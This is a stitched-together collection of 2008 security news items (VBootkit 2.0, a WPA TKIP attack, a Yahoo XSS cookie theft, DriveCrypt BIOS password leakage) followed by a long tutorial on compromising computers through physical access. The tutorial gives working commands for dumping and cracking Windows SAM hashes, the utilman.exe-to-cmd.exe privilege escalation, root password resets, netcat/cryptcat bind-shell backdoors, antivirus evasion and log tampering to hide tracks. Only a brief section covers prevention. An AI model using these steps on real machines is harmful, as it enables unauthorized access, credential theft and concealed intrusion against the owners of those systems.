VBootkit 2.0 is a follow-up to earlier work that Kumar and Kumar have done on vulnerabilities contained in the Windows boot process. In 2007, Kumar and Kumar demonstrated an earlier version of VBootkit for Windows Vista at the Black Hat Europe conference.

The latest version of VBootkit includes the ability to remotely control the victim’s computer. In addition, the software allows an attacker to increase their user privileges to system level, the highest possible level. The software can also able remove a user’s password, giving an attacker access to all of their files. Afterwards, VBootkit 2.0 restores the original password, ensuring that the attack will go undetected.

The attack, described as the first practical attack on WPA, will be discussed at the PacSec conference in Tokyo next week. There, researcher Erik Tews will show how he was able to crack WPA encryption, in order to read data being sent from a router to a laptop computer. The attack could also be used to send bogus information to a client connected to the router.

To do this, Tews and his co-researcher Martin Beck found a way to break the Temporal Key Integrity Protocol (TKIP) key, used by WPA, in a relatively short amount of time: 12 to 15 minutes, according to Dragos Ruiu, the PacSec conference’s organizer.

They have not, however, managed to crack the encryption keys used to secure data that goes from the PC to the router in this particular attack

Security experts had known that TKIP could be cracked using what’s known as a dictionary attack. Using massive computational resources, the attacker essentially cracks the encryption by making an extremely large number of educated guesses as to what key is being used to secure the wireless data.

The work of Tews and Beck does not involve a dictionary attack, however.

To pull off their trick, the researchers first discovered a way to trick a WPA router into sending them large amounts of data. This makes cracking the key easier, but this technique is also combined with a “mathematical breakthrough,” that lets them crack WPA much more quickly than any previous attempt, Ruiu said.

Tews is planning to publish the cryptographic work in an academic journal in the coming months, Ruiu said. Some of the code used in the attack was quietly added to Beck’s Aircrack-ng Wi-Fi encryption hacking tool two weeks ago, he added.

WPA is widely used on today’s Wi-Fi networks and is considered a better alternative to the original WEP (Wired Equivalent Privacy) standard, which was developed in the late 1990s. Soon after the development of WEP, however, hackers found a way to break its encryption and it is now considered insecure by most security professionals. Store chain T.J. Maxx was in the process of upgrading from WEP to WPA encryption when it experienced one of the most widely publicized data breaches in U.S. history, in which hundreds of millions of credit card numbers were stolen over a two-year period.

A new wireless standard known as WPA2 is considered safe from the attack developed by Tews and Beck, but many WPA2 routers also support WPA.

“Everybody has been saying, ‘Go to WPA because WEP is broken,’” Ruiu said. “This is a break in WPA.”

If WPA is significantly compromised, it would be a big blow for enterprise customers who have been increasingly adopting it, said Sri Sundaralingam, vice president of product management with wireless network security vendor AirTight Networks. Although customers can adopt Wi-Fi technology such as WPA2 or virtual private network software that will protect them from this attack, there are still may devices that connect to the network using WPA, or even the thoroughly cracked WEP standard, he said.

Ruiu expects a lot more WPA research to follow this work. “Its just the starting point,” he said. “Erik and Martin have just opened the box on a whole new hacker playground.”

Yahoo has since corrected the flaw and released the following statement to netcraft:

The team was made aware of this particular Cross-Site Scripting issue yesterday morning (Sunday, Oct. 26) and a fix was deployed within a matter of hours. Yahoo! appreciates Netcraft’s assistance in identifying this issue.

As a safety precaution, we recommend users change their passwords, should they still be concerned. Users should always verify via their Sign-in Seal that they are giving their passwords to Yahoo.com.

How it happened:

The attacker managed to find a flaw at hotjobs.yahoo.com that allows visitors to inject obfuscated JavaScript into the page. The script can be configured to steal authentication cookies. The authentication cookie can then be used to allow the attacker to pose as the user.  This type of attack, and loyal netleets readers already know, is called cross-site scripting. Earlier in the year netcraft found a similar flaw at ychat.help.yahoo.com.

This attack was probably executed using the CookieMonster tool that has recently affected netflix.com and bankofamerica. CookieMonster is a cookie stealing toolkit that works with both http and https sites. It siphons authentication cookies from vulnerable sites. These cookies can be used to hijack a users account.

Theregister.co.uk best describes CookieMonster as follows:

The vulnerability stems from website developers’ failure to designate authentication cookies as secure. That means web browsers are free to send them over the insecure http channel, and that’s exactly what CookieMonster causes them to do. It does this by caching all DNS responses and then monitoring hostnames that use port 443 to connect to one of the domain names stored there. CookieMonster then injects images from insecure (non-https) portions of the protected website, and – voila! – the browser sends the authentication cookie.

A CookieMonster blog listed several popular sites that were allegedly vulnerable back in September. Those sites include southwest.com, expedia.com, usairways.com, register.com, newegg.com, ebay.com, any many many more.

What can be done:

In addition to the steps outlined in this XSS tutorial, sites that contain cookies for authentication must not allow cookie values to be translated on the client side. In the early days of cookie based authentication, many sites simply stored authentication information in the cookie, which can be read in any text editor. Today, cookies merely act as a reference point for server side authentication, however if the cookie can be used from any client, it defeats the purpose of even hiding the true value.

Perhaps the easiest thing that could have been done on Yahoo’s part would have been to configure their site to use http-only or https-only cookies. If only http is allowed, malicious javascript cannot be injected.

Via: netleets.com

http://www.microsoft.com/technet/security/Bulletin/ms08-067.mspx

The password checking routine of DriveCrypt fails to sanitize the BIOS keyboard buffer before AND after reading passwords.

Affected Software

Secu Star’s DriveCrypt Plus Pack v3.9 (possibly other versions also)

Technical Description

DriveCrypt’s pre-boot authentication routines use the BIOS API to read user input via the keyboard. The BIOS internally copies the keystrokes in a RAM structure called the BIOS Keyboard buffer inside the BIOS Data Area. This buffer is not flushed after use, resulting in potential plain text password leakage once the OS is fully booted, assuming the attacker can read the password at physical memory location 0×40:0×1e. It is also possible for a root user to reboot the computer by instrumenting the BIOS keyboard buffer in spite of the full disk encryption.

Impact

1) Plain text password disclosure. Required privileges to perform this operation are OS dependant, from unprivileged users under Windows (any), to root under most Unix. 2) A privileged attacker able to write to the MBR and knowing the password (for instance thanks to 1), is able to reboot the computer in spite of the password prompted at boot time (and in spite of disk encryption) by initializing the BIOS keybaord buffer with the correct password (using an intermediary bootloader that will in turn run DriveCrypt).

Full Technical Whitepaper

http://www.ivizsecurity.com/security-advisory-iviz-sr-0807.html

Immune Systems:
* SafeBoot Device Encryption version 4 Build 4760 and above
* SafeBoot Device Encryption version 5.x

SafeBoot’s pre-boot authentication routines use the BIOS API to read user input via the keyboard. The BIOS internally copies the keystrokes in a RAM structure called the BIOS Keyboard buffer inside the BIOS Data Area. This buffer is not flushed after use, resulting in potential plain text password leakage once the OS is fully booted, assuming the attacker can read the password at physical memory location 0×40:0×1e.
http://www.ivizsecurity.com/security-advisory-iviz-sr-08010.html

Table of Contents
-Disclaimer
-Introduction

Part 1: Gaining Access
-LiveCDs
-Windows Option 1: Cracking the Password
-Windows Option 2: Circumventing the Password
-Windows Option 3: Utilman privilege escalation exploit
-MacOSX: Single User Mode
-Linux: /etc/passwd and /etc/shadow

Part 2: Exploiting the System
-Harvesting Information
-Backdoors and Rootkits

Part 3: Conclusion
-Cleaning Up Your Tracks
-How to Prevent These Attacks
-Conclusion
-Tools/Reading Material

————-
Disclaimer
————-

This article is intended as a basic overview of techniques to
compromise computers given physical access. Most of this information
is already easily available online, but I thought putting it all in
one place and explaining the techniques and tools in a concise way
would be a worthwhile endeavor. The text of this article is entirely
my own. Hopefully, this could serve as an introduction for someone
who is just starting out and might give some ideas about where to go
next. This is not intended to be an in-depth guide to any of the
specific techniques or tools mentioned in the article, but hopefully
I’ve included enough explanation for basic understanding of what’s
going on. This article may be re-published without permission,
provided my name remains on it. As computer security is a rapidly
changing field, the contents of this article are relevant today
(7/12/2008), but may be out of date in the near future. However, the
general principles of these attacks will most likely remain the same.

This article is intended for educational use only. The attacks
included should only be attempted with permission from the owner of
the target system. Gaining unauthorized access to a computer system
is a felony, and I am not responsible for any damage caused by the
use of these techniques.

Part 1: Gaining Access

———–
LiveCDs
———–

A LiveCD is a complete (sometimes extremely minimal) operating system
that can be run straight from a CD (or a USB drive). Simply pop in
the CD before booting, turn on the computer, tell it to boot from CD
(on my machine, you can bring up a boot menu by pressing F12), and
go.

My LiveCD of choice is BackTrack (http://www.remote-exploit.org/backtrack.html).
It is a LiveCD designed for security and penetration testing, so it
comes bundled with dozens of powerful programs that every security
expert should have.

The LiveCD can be invaluable in bypassing operating system security
because it generally allows a user to access the partitions of the
harddrive without actually running the native operating system. What
this means is that if you just want access to the files on a machine,
you can stop reading here: just boot to a LiveCD, navigate to the
proper partition, and enjoy full file access. However, actually
gaining access to the programs, services, and information stored on a
computer may be more complicated, and is dependent on the operating
system. I will briefly cover basic tactics for gaining administrative access
to Windows, MacOS, and many versions of Linux.

—————————————————-
Windows Option 1: Cracking the Password
—————————————————-

On most Windows operating systems, user information and passwords are
stored in what is called a SAM file. This file is typically stored
in “WINDOWS/System32/config/SAM”, but is not accessible when
Windows is running. The file itself is encrypted with a key stored
in “WINDOWS/System32/config/system”, which is also not accessible
when Windows is running. However, by booting to a LiveCD, these
files can be accessed, and with the proper tools, decryption of the
SAM file and decryption of the passwords stored within is possible.

For this example, I booted the target Windows machine using BackTrack
3. First, I opened up a terminal and navigated to the directory
containing the SAM and system key, and then copied them to a temp
directory. Then, I navigated to the temp directory and decrypted the
SAM file using the bkhive and samdump2 tools, both of which are
included in BackTrack. The harddrive in this instance was mounted as
“hda2”, but this may vary.

# cd /mnt/hda2/WINDOWS/System32/config
# cp SAM /tmp
# cp system /tmp
# cd /tmp
# bkhive system key
# samdump2 SAM key > /tmp/passwords.txt

This results in the decrypted SAM file being stored as a text file
called “passwords.txt”. Now, the passwords in this file must be
decrypted to plaintext if they are to be usable. On Windows
operating systems prior to Vista, the passwords in the SAM file are
encrypted using a notoriously insecure hashing algorithm called LM
(LanManager). On Vista, the SAM file is encrypted using the more
secure NTLM algorithm.

There are typically three approaches to decrypting these passwords:
rainbow tables, wordlists, and brute-force. The detailed specifics
of these approaches are beyond the scope of this article, but I will
give a brief explanation on these methods.

Rainbow tables use an algorithm based on chains of one-way hash
functions to leverage increased pre-computing time to allow for fast password
cracking. Rainbow tables are specially generated for a specific type of hash
(MD5, LM, etc.), and can take anywhere from minutes to years
to generate, but once they have been generated, they can be a powerful
tool to quickly decrypt passwords. Included in BackTrack is
RainbowCrack (http://www.antsight.com/zsl/rainbowcrack/),
the standard tool for generating and utilizing rainbow tables for decryption.
Pre-generated rainbow tables can be found – I recommend FreeRainbowTables
(http://www.freerainbowtables.com/) and the Shmoo Group
(http://rainbowtables.shmoo.com/) for tables.

Sample usage of rtgen for generating rainbow tables of LM hashes (this may take several hours):

# rtgen lm alpha 1 7 0 2100 8000000 all
# rtgen lm alpha 1 7 1 2100 8000000 all
# rtgen lm alpha 1 7 2 2100 8000000 all
# rtgen lm alpha 1 7 3 2100 8000000 all
# rtgen lm alpha 1 7 4 2100 8000000 all

Sample usage of RainbowCrack for using these rainbow tables to
decrypt our SAM passwords:

First sort the tables:
# rtsort lm_alpha#1-7_0_2100×8000000_all.rt
# rtsort lm_alpha#1-7_1_2100×8000000_all.rt
# rtsort lm_alpha#1-7_2_2100×8000000_all.rt
# rtsort lm_alpha#1-7_3_2100×8000000_all.rt
# rtsort lm_alpha#1-7_4_2100×8000000_all.rt

Next, crack the hashes:
# rcrack *.rt -f passwords.txt

If rainbow tables are not an option due to space constraints (the tables
themselves can be enormous) or other reasons, my next preferred
method is using a wordlist. Wordlists are readily available online
and can allow for a dictionary attack: checking the hashes of every
entry in the wordlist against the hashed password and looking for a
match, which would yield the plaintext password. Wordlists vary from
a simple lower-case dictionary to larger, more comprehensive
combinations of uppercase, lowercase, numbers, and symbols. Using
wordlists is a tradeoff – the larger the wordlist, the higher the
chance of cracking the password, but the longer the cracking will
take. My tool of choice for cracking passwords using wordlists is
John the Ripper (http://www.openwall.com/john/), also included in BackTrack.

Sample usage of John the Ripper with a wordlist:
# john -w=[wordlist] -f=NT passwords.txt

If neither wordlists nor rainbow tables are an option, the last
resort is a brute-force attack. Brute-forcing is trying literally
every possible combination of letters, numbers, and symbols.
Obviously, this technique is time-consuming, and sometimes
prohibitively so. Often it would take years to brute-force a
reasonably long, strong password. But for shorter passwords, this
may be an option. Again, I prefer to use John the Ripper.

Sample usage of John the Ripper using brute-force:
# john –incremental:all -f=NT passwords.txt

———————————————————–
Windows Option 2: Circumventing the Password
———————————————————–

Sometimes, an attacker only desires access to the system but does not
need the knowledge of the owner’s password. It is possible to
completely circumvent the Windows login password by wiping out the
password rather than cracking it. This is usually a much faster,
easier process.

In this attack, I typically boot the target Windows machine using
BackTrack. Then, I navigate to the the “WINDOWS/System32/config”
folder and make a backup of the user’s SAM and system files. This is
for the purposes of covering my tracks and restoring the original
passwords later. If an attacker were not concerned about stealth,
then this step would be unnecessary. I backup the files to a USB
drive that mounts as “sda1”. This may vary on your system.

# cd /mnt/hda2/WINDOWS/System32/config
# cp SAM /mnt/sda1/
# cp system /mnt/sda1/

Next, I reboot and boot to another of my favorite LiveCDs: the NT Password
and Registry Editor (http://home.eunet.no/pnordahl/ntpasswd/).
By navigating through the menus and following the instructions, it
is trivial to reset a chosen user’s password or promote an existing
user to Administrator privileges.

When I am done using the system as an Administrator, I make sure to
restore the user’s original SAM and system file, so there is no
evidence of a password change.

——————————————————————-
Windows Option 3: Utilman privilege escalation exploit
——————————————————————-

Many Windows operating systems allow the running of a service called
Utility Manager prior to actually logging in as a user. This program
is executed with System privileges (a special level higher than
Administrator), so with a LiveCD, it is possible to trick Windows
into executing an arbitrary program with System privileges prior to
logging in. In this example, I’ll get a root shell by tricking
Windows into executing cmd.exe instead of utilman.exe.

I boot up the target Windows machine with BackTrack, and navigate to
“WINDOWS/System32”. Then I simply backup utilman.exe, and copy
cmd.exe on top of utilman.exe.

# cd /mnt/hda2/Windows/System32/
# mv Utilman.exe Utilman.backup
# cp cmd.exe Utilman.exe
# reboot

Then, simply boot the system to Windows, and press Windows + U to
open up a command prompt with System privileges. (Note: this method
of exploitation may soon be patched.)

———————————-
MacOSX: Single User Mode
———————————-

To boot a Mac into “Single User mode”, simply boot the computer
and press Apple + S when blue first shows up on the screen. Next,
mount the harddrive, and either dump the password and crack it with a
tool like John the Ripper, or simply overwrite the root password:

# /sbin/mount -wu /
# /sbin/SystemStarter

To dump the existing root password:
# nidump passwd

To create a new root password:
# passwd root

——————————————-
Linux: /etc/passwd and /etc/shadow
——————————————-

On most Linux operating systems, password information is stored at
/etc/passwd. A sample entry might look like:

root:x:0:0:root:/root:/bin/bash

This is the information for the root user account. The “x”
indicates that the password is encrypted and stored in /etc/shadow.
The corresponding shadow entry might look like:

root:[hash].:14001:0:99999:7:::

This entry contains information on permissions for this user as well
as a hashed password. However, depending on the distribution, Linux
operating systems typically use much more secure hashing functions
including salt values, so decrypting these passwords is not typically
feasible.

Instead, an attacker can reset the password by simply running
BackTrack and checking the /etc/passwd file. If there is an “x”
in the password spot, open the /etc/shadow file and delete the
password hash between the colons. If the hash is in the /etc/passwd
file, simply delete the hash in that file. Then, reboot and login as
root with no password.

Part 2: Exploiting the System

—————————–
Harvesting Information
—————————–

Once an attacker has gained access to a machine, he or she is now
able to begin harvesting information from the system. Most operating
systems have features to store passwords for wireless settings, and
many web browsers will store passwords and reveal them if prompted.
In addition, tools such as keyloggers may be installed to provide
continued information theft after the attacker has left.

There are many tools that are helpful in automatically dumping
private information from a system. On Windows, my favorite is a USB
application called the “USB Switchblade”. I prefer GonZor’s
version (http://gonzor228.com/). This tool can be used to stealthily
dump information on a system that you have access to, but I use it
for all my information gathering needs. It supports the ability to dump
Windows passwords, browser passwords, wireless passwords, and much
more. In addition, it allows you to silently install the VNC remote desktop
tool, which will open up a port (usually 5800) that can be accessed in a
browser for complete remote control. This segues nicely into the next
section…

——————————
Leaving the Door Open
——————————

In addition to stealing information from the user, many attackers
prefer to set up some sort of backdoor to allow future access to the
system remotely. My personal favorite is NetCat (http://netcat.sourceforge.net/),
which has been called the “Swiss army knife of network tools”.
NetCat is a simple utility that can open ports on a machine for
listening for remote connections, and bind those ports to programs.
For example, on a Windows machine I might run the following command
(in the directory that contains my NetCat executable):

nc -l -p[port] -d -e cmd.exe -L

This opens a port on [port] for listening for a remote connection,
and when a connection is made, it binds cmd.exe to the input and
output of that connection, allowing a remote user to execute
commands. Because using NetCat in such a manner leaves an open
door that any attacker could take advantage of, I prefer to use a
modification of NetCat called CryptCat (http://sourceforge.net/projects/cryptcat/),
which allows for password protection and encrypted channels using a
“-k” parameter to set the password:

cryptcat -l -p[port] -k[password] -d -e cmd.exe -L

Then, on my remote machine, I connect to the open port to gain
access:

cryptcat [target IP] [port] -k [password]

These tools are available cross-platform, increasing their
versatility. However, there are dozens of rootkits and backdoors
available for free use. Most are easily detectable by anti-virus
software, so I recommend coding your own backdoors or learning how to
camouflage software to evade anti-virus detection.

Conclusion

——————————-
Cleaning Up Your Tracks
——————————-

One of the more difficult tasks for any attacker is leaving behind no
evidence of the infiltration. In general, it is common practice to
backup any files related to passwords before modifying them, and to
restore these files after the attack is finished. Installing a
backdoor is probably the most difficult challenge for the attacker,
because it involves leaving many clues behind. If a user detects
that a backdoor exists, then it will be quickly closed. Popular
techniques to ensure successful backdoors include piggy-backing on
existing network applications (to use an already open port),
masquerading the process as a system service and hiding the execution
of the process from utilities such as the task manager, and
installing the backdoor to execute on startup. These topics are
highly operating system dependent and go beyond the scope of this
article. Finally, many operating systems keep logs of when users
access the system and run programs, so these logs should be located
and modified from LiveCD at the conclusion of an attack.

————————————-
How to Prevent These Attacks
————————————-

There are a number of simple steps a user can take to mitigate the
risk of attacks via physical access. Obviously, the first and most
important of these is to not allow physical access to a system by an
attacker. The cardinal rule that physical access equals total access
exists for a reason.

However, there are additional security measures that can be taken.
Harddrive encryption is an emergent technology that prevents the
mounting and reading of material without proper authentication.
There are advanced methods of circumventing disk encryption, but this
preventative measure will prevent almost all attacks of this kind.
Also, it is good practice to enable a BIOS or firmware password on
your system. This will prevent booting to a LiveCD or running other
malicious software on a system. Password strength is also very
important: strong passwords contain lowercase letters, uppercase
letters, numbers, and symbols, and are at least 8 characters long.
Having strong passwords seriously mitigates the risk of having the
password cracked via wordlist or rainbow tables, and makes the use of
brute-force infeasible. Finally, in Windows, make sure to disable
the LM hashing protocol if possible, in favor of the more secure NTLM
hash.

————–
Conclusion
————–

Thank you for taking the time to read this article. I hope it will
be useful to someone.

Tools/Reading Material

BackTrack 3 – http://www.remote-exploit.org/backtrack.html
CryptCat – http://sourceforge.net/projects/cryptcat/
Free Rainbow Tables – http://rainbowtables.shmoo.com/
John the Ripper – http://www.openwall.com/john/
NetCat – http://netcat.sourceforge.net/
NT Password and Registry Editor – http://home.eunet.no/pnordahl/ntpasswd/
RainbowCrack – http://www.antsight.com/zsl/rainbowcrack/
Shmoo Group Rainbow Tables - http://rainbowtables.shmoo.com/
USB Switchblade – http://gonzor228.com/